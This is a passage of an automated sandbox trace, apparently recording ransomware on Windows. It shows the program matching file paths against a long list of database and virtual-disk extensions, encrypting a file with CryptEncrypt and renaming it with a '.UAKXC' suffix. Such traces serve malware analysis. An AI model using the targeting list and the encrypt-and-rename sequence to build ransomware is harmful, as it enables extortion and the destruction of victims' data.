0x0 [0160.788] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".oqy") returned 0x0 [0160.788] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".orx") returned 0x0 [0160.788] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".owc") returned 0x0 [0160.788] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".p96") returned 0x0 [0160.788] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".p97") returned 0x0 [0160.788] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".pan") returned 0x0 [0160.788] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".pdb") returned 0x0 [0160.788] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".pdm") returned 0x0 [0160.788] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".pnz") returned 0x0 [0160.788] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".qry") returned 0x0 [0160.788] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".qvd") returned 0x0 [0160.788] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".rbf") returned 0x0 [0160.788] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".rctd") returned 0x0 [0160.789] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".rod") returned 0x0 [0160.789] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".rodx") returned 0x0 [0160.789] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".rpd") returned 0x0 [0160.789] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".rsd") returned 0x0 [0160.789] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".sas7bdat") returned 0x0 [0160.789] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".sbf") returned 0x0 [0160.789] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".scx") returned 0x0 [0160.789] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".sdb") returned 0x0 [0160.789] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".sdc") returned 0x0 [0160.789] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".sdf") returned 0x0 [0160.789] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".sis") returned 0x0 [0160.789] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".spq") returned 0x0 [0160.789] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".sql") returned 0x0 [0160.789] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".sqlite") returned 0x0 [0160.789] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".sqlite3") returned 0x0 [0160.789] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".sqlitedb") returned 0x0 [0160.789] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".te") returned 0x0 [0160.789] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".temx") returned 0x0 [0160.789] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".tmd") returned 0x0 [0160.790] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".tps") returned 0x0 [0160.790] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".trc") returned 0x0 [0160.790] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".trm") returned 0x0 [0160.790] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".udb") returned 0x0 [0160.790] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".udl") returned 0x0 [0160.790] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".usr") returned 0x0 [0160.790] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".v12") returned 0x0 [0160.790] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".vis") returned 0x0 [0160.790] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".vpd") returned 0x0 [0160.790] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".vvv") returned 0x0 [0160.790] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".wdb") returned 0x0 [0160.790] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".wmdb") returned 0x0 [0160.790] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".wrk") returned 0x0 [0160.790] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".xdb") returned 0x0 [0160.790] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".xld") returned 0x0 [0160.790] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".xmlff") returned 0x0 [0160.790] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".abcddb") returned 0x0 [0160.790] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".abs") returned 0x0 [0160.791] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".abx") returned 0x0 [0160.791] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".accdw") returned 0x0 [0160.791] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".adn") returned 0x0 [0160.791] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".db2") returned 0x0 [0160.791] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".fm5") returned 0x0 [0160.791] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".hjt") returned 0x0 [0160.791] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".icg") returned 0x0 [0160.791] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".icr") returned 0x0 [0160.791] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".kdb") returned 0x0 [0160.791] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".lut") returned 0x0 [0160.791] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".maw") returned 0x0 [0160.791] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".mdn") returned 0x0 [0160.791] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".mdt") returned 0x0 [0160.791] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".vdi") returned 0x0 [0160.791] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".vhd") returned 0x0 [0160.791] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".vmdk") returned 0x0 [0160.791] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".pvm") returned 0x0 [0160.791] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".vmem") returned 0x0 [0160.791] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".vmsn") returned 0x0 [0160.791] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".vmsd") returned 0x0 [0160.792] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".nvram") returned 0x0 [0160.792] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".vmx") returned 0x0 [0160.792] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".raw") returned 0x0 [0160.792] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".qcow2") returned 0x0 [0160.792] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".subvol") returned 0x0 [0160.792] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".bin") returned 0x0 [0160.792] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".vsv") returned 0x0 [0160.792] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".avhd") returned 0x0 [0160.792] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".vmrs") returned 0x0 [0160.792] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".vhdx") returned 0x0 [0160.792] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".avdx") returned 0x0 [0160.792] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".vmcx") returned 0x0 [0160.792] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".iso") returned 0x0 [0160.792] SetFilePointerEx (in: hFile=0x6cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0160.792] WriteFile (in: hFile=0x6cc, lpBuffer=0x3abfd70*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x3abfc78, lpOverlapped=0x0 | out: lpBuffer=0x3abfd70*, lpNumberOfBytesWritten=0x3abfc78*=0x20c, lpOverlapped=0x0) returned 1 [0161.705] WriteFile (in: hFile=0x6cc, lpBuffer=0x3abfc80*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x3abfc7c, lpOverlapped=0x0 | out: lpBuffer=0x3abfc80*, lpNumberOfBytesWritten=0x3abfc7c*=0xa, lpOverlapped=0x0) returned 1 [0161.705] SetEndOfFile (hFile=0x6cc) returned 1 [0161.705] SetFilePointerEx (in: hFile=0x6cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0161.705] ReadFile (in: hFile=0x6cc, lpBuffer=0x5030000, nNumberOfBytesToRead=0x251f, lpNumberOfBytesRead=0x3abfc88, lpOverlapped=0x0 | out: lpBuffer=0x5030000*, lpNumberOfBytesRead=0x3abfc88*=0x251f, lpOverlapped=0x0) returned 1 [0161.711] SetFilePointerEx (in: hFile=0x6cc, liDistanceToMove=0xffffdae1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0161.711] WriteFile (in: hFile=0x6cc, lpBuffer=0x5030000*, nNumberOfBytesToWrite=0x251f, lpNumberOfBytesWritten=0x3abfc44, lpOverlapped=0x0 | out: lpBuffer=0x5030000*, lpNumberOfBytesWritten=0x3abfc44*=0x251f, lpOverlapped=0x0) returned 1 [0161.711] CloseHandle (hObject=0x6cc) returned 1 [0161.715] GetProcessHeap () returned 0xea0000 [0161.715] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x7fd7) returned 0x77970d0 [0161.715] lstrcpyW (in: lpString1=0x77970d0, lpString2="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml" | out: lpString1="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml") returned="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml" [0161.715] lstrcatW (in: lpString1="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpString2=".UAKXC" | out: lpString1="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml.UAKXC") returned="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml.UAKXC" [0161.715] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml.UAKXC" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml.uakxc")) returned 1 [0161.716] GetProcessHeap () returned 0xea0000 [0161.716] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x77970d0 | out: hHeap=0xea0000) returned 1 [0161.716] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef63e8 | out: hHeap=0xea0000) returned 1 [0161.716] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef2df8 | out: hHeap=0xea0000) returned 1 [0161.716] CryptGenRandom (in: hProv=0xed0cd0, dwLen=0x20, pbBuffer=0x3abfd50 | out: pbBuffer=0x3abfd50) returned 1 [0161.716] CryptGenRandom (in: hProv=0xed0cd0, dwLen=0x8, pbBuffer=0x3abfd48 | out: pbBuffer=0x3abfd48) returned 1 [0161.716] CryptEncrypt (in: hKey=0xecf860, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3abfd70*, pdwDataLen=0x3abfc8c*=0x28, dwBufLen=0x20c | out: pbData=0x3abfd70*, pdwDataLen=0x3abfc8c*=0x200) returned 1 [0161.717] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0161.718] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6cc [0161.718] GetLastError () returned 0x0 [0161.718] GetFileSizeEx (in: hFile=0x6cc, lpFileSize=0x3abfc88 | out: lpFileSize=0x3abfc88*=1988) returned 1 [0161.718] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".4dd") returned 0x0 [0161.718] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".4dl") returned 0x0 [0161.718] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".accdb") returned 0x0 [0161.718] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".accdc") returned 0x0 [0161.718] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".accde") returned 0x0 [0161.718] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".accdr") returned 0x0 [0161.718] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".accdt") returned 0x0 [0161.718] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".accft") returned 0x0 [0161.718] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".adb") returned 0x0 [0161.718] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ade") returned 0x0 [0161.718] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".adf") returned 0x0 [0161.719] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".adp") returned 0x0 [0161.719] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".arc") returned 0x0 [0161.719] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ora") returned 0x0 [0161.719] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".alf") returned 0x0 [0161.719] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ask") returned 0x0 [0161.719] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".btr") returned 0x0 [0161.719] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".bdf") returned 0x0 [0161.719] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".cat") returned 0x0 [0161.719] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".cdb") returned 0x0 [0161.719] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ckp") returned 0x0 [0161.719] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".cma") returned 0x0 [0161.719] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".cpd") returned 0x0 [0161.719] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dacpac") returned 0x0 [0161.719] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dad") returned 0x0 [0161.719] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dadiagrams") returned 0x0 [0161.719] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".daschema") returned 0x0 [0161.719] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".db") returned 0x0 [0161.719] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".db-shm") returned 0x0 [0161.719] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".db-wal") returned 0x0 [0161.720] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".db3") returned 0x0 [0161.720] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dbc") returned 0x0 [0161.720] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dbf") returned 0x0 [0161.720] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dbs") returned 0x0 [0161.720] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dbt") returned 0x0 [0161.720] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dbv") returned 0x0 [0161.720] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dbx") returned 0x0 [0161.720] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dcb") returned 0x0 [0161.720] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dct") returned 0x0 [0161.720] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dcx") returned 0x0 [0161.720] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ddl") returned 0x0 [0161.720] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dlis") returned 0x0 [0161.720] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dp1") returned 0x0 [0161.720] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dqy") returned 0x0 [0161.720] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dsk") returned 0x0 [0161.720] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dsn") returned 0x0 [0161.720] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dtsx") returned 0x0 [0161.720] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dxl") returned 0x0 [0161.721] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".eco") returned 0x0 [0161.721] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ecx") returned 0x0 [0161.721] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".edb") returned 0x0 [0161.721] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".epim") returned 0x0 [0161.721] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".exb") returned 0x0 [0161.721] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fcd") returned 0x0 [0161.721] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fdb") returned 0x0 [0161.721] StrStrIW (lpFirst="C:\\MSOCache\\All 